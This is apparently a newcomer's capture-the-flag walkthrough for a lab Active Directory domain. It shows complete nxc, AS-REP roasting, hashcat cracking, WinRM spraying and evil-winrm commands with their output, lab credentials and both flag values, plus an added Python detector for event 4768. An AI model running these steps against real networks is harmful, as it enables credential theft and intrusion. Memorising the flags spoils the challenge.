Newcomers
Welcome to Active Directory! This page is designed for beginners and those with limited experience in Active Directory environments - including individuals familiar with entry-level certifications like the OSCP. The goal of this page is to break down the learning curve of Active Directory, and hopefully help you get the first flag!
Support
If you've read through this guide and are facing an issue, feel free to reach out to anyone on the team at the conference!
We have @gatari (Zavier), @Sora (Jun Yu), @Gladiator (Cher Boon)!
Quick Start
You phished an HR employee at JEZZ CORPORATION and have successfully gotten into their network.
The credentials are:
A.Granne: Z7pLq9Vp
┌──(kali㉿kali)-[~/Desktop/VPN_Packs]
└─$ nxc smb 10.3.10.10 -u 'A.Granne' -p 'Z7pLq9Vp' --shares -M spider_plus -o DOWNLOAD_FLAG=True
SMB 10.3.10.10 445 FILE-SRV [*] Windows Server 2022 Build 20348 x64 (name:FILE-SRV) (domain:JEZZCORP.LOCAL) (signing:False) (SMBv1:False)
SMB 10.3.10.10 445 FILE-SRV [+] JEZZCORP.LOCAL\A.Granne:Z7pLq9Vp
SMB 10.3.10.10 445 FILE-SRV [-] Neo4J does not seem to be available on bolt://127.0.0.1:7687.
SPIDER_PLUS 10.3.10.10 445 FILE-SRV [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.3.10.10 445 FILE-SRV [*] DOWNLOAD_FLAG: True
SPIDER_PLUS 10.3.10.10 445 FILE-SRV [*] STATS_FLAG: True
SPIDER_PLUS 10.3.10.10 445 FILE-SRV [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.3.10.10 445 FILE-SRV [*] EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.3.10.10 445 FILE-SRV [*] MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.3.10.10 445 FILE-SRV [*] OUTPUT_FOLDER: /home/kali/.nxc/modules/nxc_spider_plus
SMB 10.3.10.10 445 FILE-SRV [*] Enumerated shares
SMB 10.3.10.10 445 FILE-SRV Share Permissions Remark
SMB 10.3.10.10 445 FILE-SRV ----- ----------- ------
SMB 10.3.10.10 445 FILE-SRV ADMIN$ Remote Admin
SMB 10.3.10.10 445 FILE-SRV C$ Default share
SMB 10.3.10.10 445 FILE-SRV IPC$ READ Remote IPC
SMB 10.3.10.10 445 FILE-SRV Onboarding READ Onboarding
SPIDER_PLUS 10.3.10.10 445 FILE-SRV [+] Saved share-file metadata to "/home/kali/.nxc/modules/nxc_spider_plus/10.3.10.10.json".
SPIDER_PLUS 10.3.10.10 445 FILE-SRV [*] SMB Shares: 4 (ADMIN$, C$, IPC$, Onboarding)
SPIDER_PLUS 10.3.10.10 445 FILE-SRV [*] SMB Readable Shares: 2 (IPC$, Onboarding)
SPIDER_PLUS 10.3.10.10 445 FILE-SRV [*] SMB Filtered Shares: 1
SPIDER_PLUS 10.3.10.10 445 FILE-SRV [*] Total folders found: 0
SPIDER_PLUS 10.3.10.10 445 FILE-SRV [*] Total files found: 1
SPIDER_PLUS 10.3.10.10 445 FILE-SRV [*] File size average: 8.45 KB
SPIDER_PLUS 10.3.10.10 445 FILE-SRV [*] File size min: 8.45 KB
SPIDER_PLUS 10.3.10.10 445 FILE-SRV [*] File size max: 8.45 KB
SPIDER_PLUS 10.3.10.10 445 FILE-SRV [*] File unique exts: 1 (xlsx)
SPIDER_PLUS 10.3.10.10 445 FILE-SRV [*] Downloads successful: 1
SPIDER_PLUS 10.3.10.10 445 FILE-SRV [+] All files processed successfully
Find the Excel file that spider_plus downloaded (see OUTPUT_FOLDER above). It contains:
|Full Name|UPN|Password|Intern Period|School|
|---|---|---|---|---|
|Barbe Johnson|[email protected]|fQ2Hd8Ak|Jan 2026 - Jun 2026|Nanyang Polytechnic|
|Jess Kumar|[email protected]|Z7pLr2Qa|Jan 2026 - Jun 2026|Singapore Polytechnic|
|Kami Yeo|[email protected]|mC84KqRt|Jan 2026 - Jun 2026|Temasek Polytechnic|
Flag 1
┌──(kali㉿kali)-[~/Desktop/VPN_Packs]
└─$ nxc ldap 10.3.10.40 -u 'A.Granne' -p 'Z7pLq9Vp' --asreproast apacoutput.txt
LDAP 10.3.10.40 389 DC01-SRV [*] Windows Server 2022 Build 20348 (name:DC01-SRV) (domain:JEZZCORP.LOCAL) (signing:None) (channel binding:No TLS cert)
LDAP 10.3.10.40 389 DC01-SRV [+] JEZZCORP.LOCAL\A.Granne:Z7pLq9Vp
LDAP 10.3.10.40 389 DC01-SRV [-] Neo4J does not seem to be available on bolt:/127.0.0.1:7687.
LDAP 10.3.10.40 389 DC01-SRV [*] Total of records returned 1
LDAP 10.3.10.40 389 DC01-SRV [email protected]:a981fcc8e6ad4e097a370a12c541b4bb$68ca150ca689b438453b5845d839743dd8a45cb6323ec46e4b33038ddb23ffe1d38a85ec437f7e1ae9371bc0a3f3338652a7d59eec1831abf6d1418b3119e15a7829c80ea44d4f93b6f2aff33733193d023b26ba159bfd2af9b7ba1aa926e8bcc033090f9c465301cd55034b99f62f17ae7b786e6f19f172483f7855131d4912e1f48fc5e6249ac28af41cfd2912c074eb16f2165f0c858da81f15c9cc635f13501523c4f9ba566d7743b808f0454e73cf84ed9db4123e1d034d5b698526aaf881de33965762d1a5ff8fbf55aec00ef663fbe26a315f98b29fbdf42f3111e0afd073f05f5a9bf86182394cbaf457421e
┌──(kali㉿kali)-[~/Desktop/ASYNC-Security/YBNCTF2025]
└─$ /home/kali/Desktop/Tools/Bruteforcing/hashcat-6.2.6/hashcat.bin -m18200 apacoutput.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 5.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-sandybridge-AMD Ryzen 5 5600 6-Core Processor, 2915/5894 MB (1024 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 1 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
Cracking performance lower than expected?
* Append -O to the commandline.
This lowers the maximum supported password/salt length (usually down to 32).
* Append -w 3 to the commandline.
This can cause your screen to lag.
* Append -S to the commandline.
This has a drastic speed impact but can be better for specific attacks.
Typical scenarios are a small wordlist but a large ruleset.
* Update your backend API runtime / driver the right way:
https://hashcat.net/faq/wrongdriver
* Create more work items to make use of your parallelization power:
https://hashcat.net/faq/morework
[email protected]:12386818a385594bd46eff65059f77f1$830c2d1ad4c06eb3b4f3de52c5e3e1a1dfa1bcb69275756d9d7880deb16a6283a2c469cfb2909d8ec177627a23dcd7ae85e810577caee81c7da16e2df8d0cdb75ac1eb290816189811829ed5273dc4b66900a434de4fccb2450e92053335264bf0dfb3c68e69fd9f3d8152b9810b18312161b175b0cdaccb13b2dd12d06cd519c30cc6e684d7f182de62e04c746feba8ba887ceb5a6d5c9b52ef5a7675cc72c3d94f902c24f657308fcf591d44d05771a5a5d094deb9d6c57e89a6495535860f4d54bb9823af5516c49f3de8b7e843fe3b470e0876b08683b96a143e545520e9f31db30642ab0033ea21598f9bce2225:caitlind22
Cracked credentials: L.Rodriguez : caitlind22
┌──(kali㉿kali)-[~/Desktop/ASYNC-Security/YBNCTF2025]
└─$ nxc winrm 10.3.10.0/24 -u 'L.Rodriguez' -p 'caitlind22'
WINRM 10.3.10.10 5985 FILE-SRV [+] JEZZCORP.LOCAL\L.Rodriguez:caitlind22 (Pwn3d!)
┌──(kali㉿kali)-[~/Desktop/ASYNC-Security/YBNCTF2025]
└─$ evil-winrm -i 10.3.10.10 -u 'L.Rodriguez' -p 'caitlind22'
*Evil-WinRM* PS C:\Users> tree /f
Folder PATH listing for volume Windows 2022
Volume serial number is 20F5-5BE0
C:.
¦ FLAG1.txt
¦
+---Administrator
+---L.Rodriguez
¦ +---Desktop
¦ +---Documents
¦ +---Downloads
¦ +---Favorites
¦ +---Links
¦ +---Music
¦ +---Pictures
¦ +---Saved Games
¦ +---Videos
+---localuser
+---Public
+---rangeadmin
+---rangeuser
*Evil-WinRM* PS C:\Users> cat FLAG1.TXT
9575a78bd3bf38af376a657100dd10c1
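The AS-REP roast in the Flag 1 steps only works against an account that does not require Kerberos pre-authentication, and the domain controller records the request as Security event 4768. As an added example (not part of the original walkthrough), this Python detection flags such requests in exported 4768 records; the event lines, account names and IP addresses are constructed, and the JSON-lines export layout is an assumption.

```python
import json
from collections import defaultdict

# Constructed sample: EventData fields of Security event 4768 (Kerberos TGT
# requested) in an assumed JSON-lines export. Accounts and IPs are made up.
SAMPLE_EVENTS = """
{"EventID": 4768, "TargetUserName": "svc.backup", "Status": "0x0", "TicketEncryptionType": "0x12", "PreAuthType": "2", "IpAddress": "::ffff:10.0.0.21"}
{"EventID": 4768, "TargetUserName": "j.doe", "Status": "0x0", "TicketEncryptionType": "0x17", "PreAuthType": "0", "IpAddress": "::ffff:10.0.0.99"}
{"EventID": 4768, "TargetUserName": "WKS01$", "Status": "0x0", "TicketEncryptionType": "0x12", "PreAuthType": "2", "IpAddress": "::ffff:10.0.0.30"}
{"EventID": 4768, "TargetUserName": "m.lee", "Status": "0x0", "TicketEncryptionType": "0x12", "PreAuthType": "0", "IpAddress": "::ffff:10.0.0.99"}
{"EventID": 4768, "TargetUserName": "nosuchuser", "Status": "0x6", "TicketEncryptionType": "0xffffffff", "PreAuthType": "-", "IpAddress": "::ffff:10.0.0.40"}
{"EventID": 4624, "TargetUserName": "j.doe", "IpAddress": "10.0.0.40"}
"""

# etype 23 (RC4-HMAC); hashcat mode 18200, used on this page, is the
# etype 23 AS-REP mode, so an RC4 ticket without pre-auth is rated higher.
RC4_HMAC = 0x17


def find_no_preauth_tgts(lines):
    """Return {source_ip: [(account, severity), ...]} for successful TGT
    requests answered without Kerberos pre-authentication (PreAuthType 0)."""
    hits = defaultdict(list)
    for line in lines:
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        # Only successful TGT issuance matters; failed requests carry no
        # usable encryption type or pre-auth value.
        if ev.get("EventID") != 4768 or ev.get("Status") != "0x0":
            continue
        if ev.get("PreAuthType") != "0":
            continue  # normal case: the client proved knowledge of its key
        etype = int(ev["TicketEncryptionType"], 16)
        severity = "high" if etype == RC4_HMAC else "medium"
        ip = ev["IpAddress"].replace("::ffff:", "")  # strip IPv4-mapped prefix
        hits[ip].append((ev["TargetUserName"], severity))
    return dict(hits)


if __name__ == "__main__":
    for ip, accounts in find_no_preauth_tgts(SAMPLE_EVENTS.splitlines()).items():
        print(ip, accounts)
```

Several different accounts hit from one source IP in a short window is the pattern to alert on; every account the function returns should also be reviewed for whether pre-authentication really needs to be disabled.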
Flag 2
┌──(kali㉿kali)-[~/Desktop/ASYNC-Security/YBNCTF2025]
└─$ nxc winrm 10.3.10.0/24 -u 'B.Johnson' -p 'fQ2Hd8Ak'
WINRM 10.3.10.10 5985 FILE-SRV [*] Windows Server 2022 Build 20348 (name:FILE-SRV) (domain:JEZZCORP.LOCAL)
WINRM 10.3.10.20 5985 UAT-SRV [*] Windows Server 2022 Build 20348 (name:UAT-SRV) (domain:JEZZCORP.LOCAL)
WINRM 10.3.10.30 5985 MSSQL-SRV [*] Windows Server 2022 Build 20348 (name:MSSQL-SRV) (domain:JEZZCORP.LOCAL)
WINRM 10.3.10.10 5985 FILE-SRV [-] JEZZCORP.LOCAL\B.Johnson:fQ2Hd8Ak
WINRM 10.3.10.20 5985 UAT-SRV [+] JEZZCORP.LOCAL\B.Johnson:fQ2Hd8Ak (Pwn3d!)
┌──(kali㉿kali)-[~/Desktop/ASYNC-Security/YBNCTF2025]
└─$ evil-winrm -i 10.3.10.20 -u 'B.Johnson' -p 'fQ2Hd8Ak'
Evil-WinRM shell v3.5
*Evil-WinRM* PS C:\Users> tree /f
Folder PATH listing for volume Windows 2022
Volume serial number is 20F5-5BE0
C:.
¦ FLAG2.txt
¦
+---Administrator
+---B.Johnson
¦ +---Desktop
¦ +---Documents
¦ +---Downloads
¦ +---Favorites
¦ +---Links
¦ +---Music
¦ +---Pictures
¦ +---Saved Games
¦ +---Videos
+---localuser
+---Public
+---rangeadmin
+---rangeuser
*Evil-WinRM* PS C:\Users> cat FLAG2.txt
1095744decaa363007c1d480b6d22759